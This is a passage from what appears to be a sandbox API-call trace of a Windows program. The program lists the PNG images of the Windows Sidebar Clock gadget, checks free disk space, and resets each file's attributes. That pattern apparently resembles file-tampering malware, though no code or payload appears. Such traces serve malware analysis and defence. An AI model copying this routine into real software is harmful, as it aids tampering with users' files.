nFileSizeHigh=0x0, nFileSizeLow=0xb57, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_dot.png", cAlternateFileName="")) returned 1 [0131.740] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e36761, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e36761, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ff5efc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_h.png", cAlternateFileName="")) returned 1 [0131.740] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e36761, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e36761, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ff5efc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_m.png", cAlternateFileName="")) returned 1 [0131.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e5c8c0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e5c8c0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ff5efc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb67, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_s.png", cAlternateFileName="")) returned 1 [0131.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e82a1f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e82a1f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ff5efc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x702e, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_settings.png", cAlternateFileName="")) returned 1 [0131.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fff7d5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fff7d5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb501c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_bottom.png", cAlternateFileName="")) returned 1 [0131.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fff7d5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fff7d5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb501c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_divider_left.png", cAlternateFileName="")) returned 1 [0131.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9025934, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9025934, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb501c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_divider_right.png", cAlternateFileName="")) returned 1 [0131.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9025934, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9025934, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb501c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_left.png", cAlternateFileName="")) returned 1 [0131.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb904ba93, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb904ba93, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50421bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_right.png", cAlternateFileName="")) returned 1 [0131.744] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb904ba93, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb904ba93, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50421bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_top.png", cAlternateFileName="")) returned 1 [0131.744] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb904ba93, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb904ba93, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50421bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_bottom_left.png", cAlternateFileName="")) returned 1 [0131.744] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9071bf2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9071bf2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50421bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_bottom_right.png", cAlternateFileName="")) returned 1 [0131.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9071bf2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9071bf2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb506831c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_top_left.png", cAlternateFileName="")) returned 1 [0131.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb506831c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_top_right.png", cAlternateFileName="")) returned 1 [0131.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb506831c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x83, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider.png", cAlternateFileName="")) returned 1 [0131.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90bdeb0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90bdeb0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb508e47c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider_left.png", cAlternateFileName="")) returned 1 [0131.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90bdeb0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90bdeb0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb508e47c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider_right.png", cAlternateFileName="")) returned 1 [0131.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90e400f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90e400f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50b45dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_disabled.png", cAlternateFileName="")) returned 1 [0131.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb910a16e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb910a16e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50da73c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x41a, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_hover.png", cAlternateFileName="")) returned 1 [0131.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91302cd, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb91302cd, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50da73c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x464, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_pressed.png", cAlternateFileName="")) returned 1 [0131.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91302cd, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb91302cd, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50da73c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_rest.png", cAlternateFileName="")) returned 1 [0131.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb915642c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb915642c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb510089c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_disabled.png", cAlternateFileName="")) returned 1 [0131.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb915642c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb915642c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb510089c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x417, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_hover.png", cAlternateFileName="")) returned 1 [0131.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb915642c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb915642c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb510089c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x45f, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_pressed.png", cAlternateFileName="")) returned 1 [0131.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb917c58b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb917c58b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb51269fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x358, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_rest.png", cAlternateFileName="")) returned 1 [0131.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e82a1f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e82a1f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb533bd3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="spacer_highlights.png", cAlternateFileName="")) returned 1 [0131.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ea8b7e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ea8b7e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb533bd3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4eac, dwReserved0=0x0, dwReserved1=0x0, cFileName="square.png", cAlternateFileName="")) returned 1 [0131.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ececdd, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ececdd, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb533bd3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_dot.png", cAlternateFileName="")) returned 1 [0131.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ea8b7e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ea8b7e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb5361e9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1db, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_h.png", cAlternateFileName="")) returned 1 [0131.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ea8b7e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ea8b7e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb5361e9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_m.png", cAlternateFileName="")) returned 1 [0131.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ececdd, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ececdd, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb54466dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_s.png", cAlternateFileName="")) returned 1 [0131.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ef4e3c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ef4e3c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56a7cdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4d87, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_settings.png", cAlternateFileName="")) returned 1 [0131.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ef4e3c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ef4e3c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56a7cdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x519b, dwReserved0=0x0, dwReserved1=0x0, cFileName="system.png", cAlternateFileName="")) returned 1 [0131.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f410fa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f410fa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56cde3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xf3, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_dot.png", cAlternateFileName="")) returned 1 [0131.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f1af9b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f1af9b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56cde3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_h.png", cAlternateFileName="")) returned 1 [0131.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f1af9b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f1af9b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56cde3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_m.png", cAlternateFileName="")) returned 1 [0131.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f1af9b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f1af9b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56f3f9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_s.png", cAlternateFileName="")) returned 1 [0131.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f410fa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f410fa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56f3f9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5a3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_settings.png", cAlternateFileName="")) returned 1 [0131.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f67259, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f67259, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb571a0fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4c3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad.png", cAlternateFileName="")) returned 1 [0131.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fd9676, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fd9676, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb574025c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_dot.png", cAlternateFileName="")) returned 1 [0131.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f8d3b8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f8d3b8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb574025c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_h.png", cAlternateFileName="")) returned 1 [0131.750] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f8d3b8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f8d3b8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb57663bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x169, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_m.png", cAlternateFileName="")) returned 1 [0131.750] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fb3517, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fb3517, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb5ad235c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_s.png", cAlternateFileName="")) returned 1 [0131.750] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fff7d5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fff7d5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb621c6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5385, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_settings.png", cAlternateFileName="")) returned 1 [0131.750] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.758] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.766] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", dwFileAttributes=0x80) returned 0 [0131.770] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.774] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png", dwFileAttributes=0x80) returned 0 [0131.777] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, 